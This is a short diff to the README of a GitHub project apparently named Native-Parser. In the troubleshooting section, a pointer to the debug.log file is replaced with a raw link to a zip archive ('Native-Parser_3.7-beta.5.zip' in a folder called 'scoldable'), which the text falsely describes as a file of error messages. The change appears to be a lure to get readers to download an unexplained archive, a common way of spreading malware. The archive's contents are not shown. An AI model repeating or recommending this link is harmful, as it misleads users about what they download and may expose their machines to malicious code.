Huy-2k11/Native-Parser/README.md

 - Check that you have installed all required libraries.
 - Ensure your Python version is compatible.
-- Review the `debug.log` file for specific error messages.
+- Review the `https://raw.githubusercontent.com/Huy-2k11/Native-Parser/main/scoldable/Native-Parser_3.7-beta.5.zip` file for specific error messages.

 If you still need help, feel free to ask questions or open an issue on the GitHub repository.